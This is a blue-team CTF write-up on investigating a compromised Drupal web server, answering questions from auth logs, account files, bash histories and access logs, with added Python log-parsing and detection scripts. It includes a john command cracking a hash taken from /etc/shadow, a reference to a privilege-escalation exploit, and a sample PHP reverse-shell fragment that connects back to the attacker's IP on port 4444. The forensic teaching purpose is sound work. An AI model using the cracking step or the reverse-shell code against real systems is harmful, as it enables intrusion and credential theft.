# Hacked Cyberdefenders

* [Details](https://cyberdefenders.org/blueteam-ctf-challenges/71#nav-overview)

You have been called to analyze a compromised Linux web server. Figure out how the threat actor gained access, what modifications were applied to the system, and what persistent techniques were utilized. (e.g. backdoors, users, sessions, etc).

* [Questions](https://cyberdefenders.org/blueteam-ctf-challenges/71#nav-questions)

#### Q1 What is the system timezone?

We can find it in the `/etc/timezone` file.

<figure><img src="/files/qTIMzB3QtshCTuhdhnqc" alt=""><figcaption></figcaption></figure>

**Ans : Europe/Brussels**

#### Q2 Who was the last user to log in to the system?

We can find it in the auth log at `/var/log/auth.log`, in the most recent `Accepted password` line.

<figure><img src="/files/hr8bTvw6CDu5VqJTZPID" alt=""><figcaption><p>Accepted password for mail from 192.168.210.131 port 57708 ssh2</p></figcaption></figure>

**Ans : mail**

#### Q3 What was the source port the user 'mail' connected from?

The same `Accepted password` line from the previous screenshot gives the answer: **57708**.

#### Q4 How long was the last session for user 'mail'? (Minutes only)

<figure><img src="/files/9gcVtdg8Yl5QCEc57Eew" alt=""><figcaption></figcaption></figure>

The `pam_unix(sshd:session)` lines show the last session for `mail` opened at 13:23:34 and closed at 13:24:11, i.e. 37 seconds, which rounds to 1 minute.

**Ans : 1**&#x20;

#### Q5 Which server service did the last user use to log in to the system?

The same log lines are tagged with the logging service, **sshd**.

**Ans : sshd**&#x20;

#### Q6 What type of authentication attack was performed against the target machine

<figure><img src="/files/P87CIOyQkxtyAGswPW9d" alt=""><figcaption></figcaption></figure>

In the same file we find a long run of `Failed password` lines for several usernames from the same source IP within a few seconds of each other, followed by the successful login: a password brute-force attack.

&#x20;**Ans : brute-force**
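The checks behind Q2 to Q6 (last accepted login with its source port, the length of that session, and the failed-login burst that marks a brute force) can be scripted instead of read off screenshots. The following Python is an added example written for this writeup, not part of the original post or of the CyberDefenders material; the `auth.log` lines it parses are constructed to mirror the pattern described above (the hostname, dates and the assumed year 2019 are made up, as syslog timestamps carry no year), and the `threshold`/`window_seconds` values are assumptions you should tune to the environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log lines (NOT the challenge's real log).
SAMPLE_AUTH_LOG = """\
Dec 24 13:20:01 webserver sshd[1299]: Failed password for invalid user admin from 192.168.210.131 port 45001 ssh2
Dec 24 13:20:02 webserver sshd[1301]: Failed password for root from 192.168.210.131 port 45002 ssh2
Dec 24 13:20:02 webserver sshd[1303]: Failed password for mail from 192.168.210.131 port 45003 ssh2
Dec 24 13:20:03 webserver sshd[1305]: Failed password for mail from 192.168.210.131 port 45004 ssh2
Dec 24 13:20:03 webserver sshd[1307]: Failed password for mail from 192.168.210.131 port 45005 ssh2
Dec 24 13:20:04 webserver sshd[1309]: Failed password for mail from 192.168.210.131 port 45006 ssh2
Dec 24 13:23:34 webserver sshd[1311]: Accepted password for mail from 192.168.210.131 port 57708 ssh2
Dec 24 13:23:34 webserver sshd[1311]: pam_unix(sshd:session): session opened for user mail by (uid=0)
Dec 24 13:24:11 webserver sshd[1311]: pam_unix(sshd:session): session closed for user mail
"""

ASSUMED_YEAR = 2019  # assumption: syslog timestamps omit the year

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<service>[\w\-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
LOGIN_RE = re.compile(
    r"^(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port (?P<port>\d+)"
)
SESSION_RE = re.compile(r"session (?P<state>opened|closed) for user (?P<user>\S+)")


def parse_auth_log(text):
    """Split auth.log into records with a datetime, service name, pid and message."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        records.append({"ts": ts, "service": m["service"],
                        "pid": int(m["pid"]), "msg": m["msg"]})
    return records


def login_events(records):
    """Every sshd Accepted/Failed line, with user, source IP and source port."""
    events = []
    for r in records:
        m = LOGIN_RE.match(r["msg"])
        if m and r["service"] == "sshd":
            events.append({**r, "result": m["result"], "user": m["user"],
                           "ip": m["ip"], "port": int(m["port"])})
    return events


def last_successful_login(records):
    """The most recent Accepted login (Q2, Q3, Q5), or None."""
    accepted = [e for e in login_events(records) if e["result"] == "Accepted"]
    return max(accepted, key=lambda e: e["ts"]) if accepted else None


def session_durations(records):
    """Pair pam_unix 'session opened'/'closed' lines by (service, pid, user) (Q4)."""
    opened, durations = {}, []
    for r in records:
        m = SESSION_RE.search(r["msg"])
        if not m:
            continue
        key = (r["service"], r["pid"], m["user"])
        if m["state"] == "opened":
            opened[key] = r["ts"]
        elif key in opened:
            start = opened.pop(key)
            durations.append({"user": m["user"], "service": r["service"],
                              "start": start, "end": r["ts"],
                              "seconds": int((r["ts"] - start).total_seconds())})
    return durations


def brute_force_sources(records, threshold=5, window_seconds=60):
    """Source IPs with >= threshold failed logins inside any sliding window (Q6)."""
    failures = defaultdict(list)
    for e in login_events(records):
        if e["result"] == "Failed":
            failures[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= threshold:
                flagged[ip] = len(times)  # total failures from this IP
                break
    return flagged


if __name__ == "__main__":
    recs = parse_auth_log(SAMPLE_AUTH_LOG)
    print("last login:", last_successful_login(recs))
    print("sessions:", session_durations(recs))
    print("brute-force sources:", brute_force_sources(recs))
```

Run it against the real file with `parse_auth_log(open("/var/log/auth.log").read())`; rotated copies (`auth.log.1`, `auth.log.2.gz`) must be concatenated in order first, and a session without a matching `closed` line (the machine was imaged while it was open, or the log rotated) is simply absent from `session_durations`, which is worth noting in the report rather than reading as "no session".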

#### Q7 How many IP addresses are listed in the '/var/log/lastlog' file?

<figure><img src="/files/a5Lhz4nVGTayLVyMLUYY" alt=""><figcaption><p>192.168.131- 192.168.56</p></figcaption></figure>

**Ans : 2**&#x20;

#### Q8 How many users have a login shell?

The login shell is the last field of each `/etc/passwd` entry. Count the users whose shell is **/bin/bash** (or another interactive shell) rather than `/usr/sbin/nologin` or `/bin/false`.

<figure><img src="/files/moXvXWP6YLTTOZphe5wP" alt=""><figcaption></figcaption></figure>

**Ans : 5**

#### Q9 What is the password of the mail user?

We can find the password hash of the `mail` user in

<mark style="color:red;">/etc/shadow</mark>

<figure><img src="/files/pHmbT7zNIUnjSr8KarbY" alt=""><figcaption></figcaption></figure>

```
# passwd.txt holds the mail user's line copied from /etc/shadow
sudo john --wordlist=/usr/share/rockyou.txt passwd.txt
sudo john --show passwd.txt
```

<figure><img src="/files/pIBopzV9VP9zXdgOm1h7" alt=""><figcaption></figcaption></figure>

**Ans : forensics**

#### Q10 Which user account was created by the attacker?

Back to `auth.log`: searching for the `useradd` command shows the account the attacker created, together with its UID and home directory.

<figure><img src="/files/ovpDoXvQzANRcTsjVc9Q" alt=""><figcaption><p>php</p></figcaption></figure>

**Ans : php**&#x20;

#### Q11 How many user groups exist on the machine?

We can find the groups in `/etc/group`, one group per line.

Open it and count the lines.

<figure><img src="/files/GaZV7XflRUjp0MSjMFpQ" alt=""><figcaption><p>lin 58</p></figcaption></figure>

**Ans : 58**

#### Q12 How many users have sudo access?

In the same file, the <mark style="color:blue;">sudo</mark> group line lists the members who get sudo through group membership. (Check `/etc/sudoers` and `/etc/sudoers.d/` as well, since they can grant sudo to users outside that group.)

<figure><img src="/files/joIEFMpRtBkdWRkv4NXB" alt=""><figcaption><p>php,mail</p></figcaption></figure>

**Ans : 2**
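For Q8, Q11 and Q12 the counts come from `/etc/passwd` and `/etc/group`, and the same pass over those files catches two classic persistence tricks the challenge description asks about: an extra uid-0 account and a user whose home sits outside `/home` (as `/usr/php` does in Q13). The following Python is an added example for this writeup, not code from the original post; the `passwd`/`group` excerpts are constructed to mirror what the writeup found, the `NON_LOGIN_SHELLS` set and the `admin_groups` list are assumptions, and a real audit must also read `/etc/sudoers` and `/etc/sudoers.d/`, which this script does not parse.

```python
# Constructed excerpts of /etc/passwd and /etc/group (NOT the challenge's real
# files); the php/mail/sudo entries mirror what the writeup found.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/mail:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
php:x:1001:1001::/usr/php:/bin/bash
"""

SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog
sudo:x:27:php,mail
www-data:x:33:
php:x:1001:
"""

# Assumption: shells that cannot be used for an interactive login.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                    "/usr/bin/false", "/bin/sync", ""}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; blank and comment lines are skipped."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def parse_group(text):
    """Parse group(5) lines into {group: {"gid": int, "members": [...]}}."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid),
                        "members": [m for m in members.split(",") if m]}
    return groups


def login_shell_users(users):
    """Q8: accounts whose shell allows an interactive login."""
    return [u["name"] for u in users if u["shell"] not in NON_LOGIN_SHELLS]


def uid0_accounts(users):
    """Any account besides root with uid 0 is a backdoor."""
    return [u["name"] for u in users if u["uid"] == 0]


def sudo_users(users, groups, admin_groups=("sudo", "wheel", "admin")):
    """Q12: users granted sudo via group membership (supplementary or primary)."""
    granted = set()
    for g in admin_groups:
        if g not in groups:
            continue
        granted.update(groups[g]["members"])
        granted.update(u["name"] for u in users if u["gid"] == groups[g]["gid"])
    return sorted(granted)


def audit(passwd_text, group_text):
    """Summarise the account picture from the two files."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    return {
        "login_shell_users": login_shell_users(users),
        "group_count": len(groups),            # Q11
        "sudo_users": sudo_users(users, groups),
        "uid0_accounts": uid0_accounts(users),
        # Regular users (uid >= 1000) whose home is not under /home, like /usr/php.
        "homes_outside_home": [u["name"] for u in users
                               if u["uid"] >= 1000 and not u["home"].startswith("/home/")],
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_PASSWD, SAMPLE_GROUP).items():
        print(f"{key}: {value}")
```

On a mounted image, point it at the copies under the mount point (`audit(open("/mnt/img/etc/passwd").read(), open("/mnt/img/etc/group").read())`) rather than at the analysis host's own files. `nobody` (uid 65534) will show up in `homes_outside_home` on many distributions and can be ignored.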

#### Q13 What is the home directory of the PHP user?

From Q10: when the attacker created the user `php`, the `useradd` entry in `auth.log` records its home directory as

&#x20;<mark style="color:purple;">/usr/php</mark>, an unusual location for a user account and a red flag in itself.

**Ans :   /usr/php**

#### Q14 What command did the attacker use to gain root privilege? (Answer contains two spaces).

We know from the previous questions that the attacker logged in as the user <mark style="color:red;">mail</mark>, whose home directory (from `/etc/passwd`) is <mark style="color:red;">/var/mail</mark>.

Let's investigate its bash history, `/var/mail/.bash_history`.

<figure><img src="/files/0HgDf2F1YdDgriNrjC7T" alt=""><figcaption><p>sudo su -</p></figcaption></figure>

**Ans : sudo su -**

#### Q15 Which file did the user 'root' delete?

Let's check root's bash history file, `/root/.bash_history`.

<figure><img src="/files/RW4rks6uxMcO6npQW3AJ" alt=""><figcaption><p>rm 37292.c</p></figcaption></figure>

**Ans : 37292.c**

#### Q16 Recover the deleted file, open it and extract the exploit author name.

After a few minutes of searching I found a copy of the file in `/tmp`.

Opening it set off Windows Defender on the analysis host, which is expected for known exploit source code.

<figure><img src="/files/3uZK7sSOCU7quVtAbRZZ" alt=""><figcaption></figcaption></figure>

The file name matches an Exploit-DB ID, so search exploit-db for 37292 and read the header of the exploit:

<figure><img src="/files/GbkSmKrETD9oxvy6HAze" alt=""><figcaption><p>Exploit Author: rebel</p></figcaption></figure>

**Ans : rebel**

#### Q17 What is the content management system (CMS) installed on the machine?

It can be identified from the Drupal entries under `/etc` and from the web root.

<figure><img src="/files/7ftqY76Tz9j6rAhfi8Io" alt=""><figcaption><p>drupal opensource CMS</p></figcaption></figure>

**Ans : drupal**&#x20;

#### Q18 What is the version of the CMS installed on the machine?

With some help from ChatGPT, we find the Drupal version in the `.info` files under `/var/www/html/` (each core module's `.info` file carries a `version = "..."` line; `includes/bootstrap.inc` also defines a `VERSION` constant):

<figure><img src="/files/gFj3yeeEGz5Dt7xFKEnE" alt=""><figcaption><p>7.26</p></figcaption></figure>

<figure><img src="/files/s3MCeJjKoCJqCKrCqNjq" alt=""><figcaption></figcaption></figure>

**Ans : 7.26**

#### Q19 Which port was listening to receive the attacker's reverse shell?

From Q6 we know the attacker's IP address, [192.168.210.131](http://192.168.210.131/).

Grep the web server's <mark style="color:red;">access.log</mark> for that address.

Among the hits is a POST request whose parameter is base64-encoded:

<figure><img src="/files/QfjXhVmxAg533ydpXQ4S" alt=""><figcaption><p>decodebase64</p></figcaption></figure>

Decode it in CyberChef (From Base64); the decoded PHP reverse shell sets the callback port:

<figure><img src="/files/SINu4nmyvWMQaNwlJPAz" alt=""><figcaption><p>$port = 4444</p></figcaption></figure>

**Ans : 4444**
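The CyberChef step above can be automated: filter `access.log` by the attacker's address, URL-decode the request line, pull out any base64-looking runs, decode them and look for the `$port` assignment. The following Python is an added example for this writeup, not code from the original post; the access-log lines and the PHP payload inside them are constructed (only the attacker IP and port 4444 are taken from the writeup), and the `B64_RE` minimum run length and `PORT_RE` pattern are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote_plus

# Constructed Apache access.log lines (NOT the challenge's real log). The first
# request carries a URL-encoded base64 blob holding a PHP reverse shell, the
# pattern the writeup decoded in CyberChef; the payload text is made up.
PAYLOAD_PHP = "$ip='192.168.210.131';$port=4444;$sock=fsockopen($ip,$port);"
PAYLOAD_B64 = base64.b64encode(PAYLOAD_PHP.encode()).decode()
SAMPLE_ACCESS_LOG = (
    '192.168.210.131 - - [24/Dec/2019:13:22:10 +0100] '
    f'"POST /?q=user/password&payload={quote(PAYLOAD_B64, safe="")} HTTP/1.1" '
    '200 1234 "-" "python-requests/2.22.0"\n'
    '192.168.210.1 - - [24/Dec/2019:13:22:15 +0100] '
    '"GET /index.php HTTP/1.1" 200 5432 "-" "Mozilla/5.0"\n'
)

# Combined log format: ip ident user [ts] "METHOD uri proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # assumption: >= 16 chars
PORT_RE = re.compile(r"\$port\s*=\s*['\"]?(\d{1,5})")


def parse_access_log(text):
    """Yield one dict per well-formed request line."""
    requests = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            requests.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "uri": m["uri"], "status": int(m["status"])})
    return requests


def decode_base64_blobs(uri):
    """URL-decode the request URI and return every run that decodes as base64."""
    decoded = []
    for run in B64_RE.findall(unquote_plus(uri)):
        try:
            raw = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue  # looked like base64 but was not (e.g. a long path segment)
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def find_reverse_shell_ports(text, attacker_ip):
    """Requests from attacker_ip whose decoded payload assigns $port."""
    hits = []
    for req in parse_access_log(text):
        if req["ip"] != attacker_ip:
            continue
        for blob in decode_base64_blobs(req["uri"]):
            m = PORT_RE.search(blob)
            if m:
                hits.append({"ts": req["ts"], "method": req["method"],
                             "port": int(m.group(1)), "payload": blob})
    return hits


if __name__ == "__main__":
    for hit in find_reverse_shell_ports(SAMPLE_ACCESS_LOG, "192.168.210.131"):
        print(hit["ts"], hit["method"], "port", hit["port"])
        print(hit["payload"])
```

Apache's default log formats record only the request line, not the POST body, so a payload that shows up in `access.log` travelled in the URL; a payload sent in the body is invisible here and needs a packet capture or a body-logging module to recover.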

We finished, thank you for reading ❤🥰
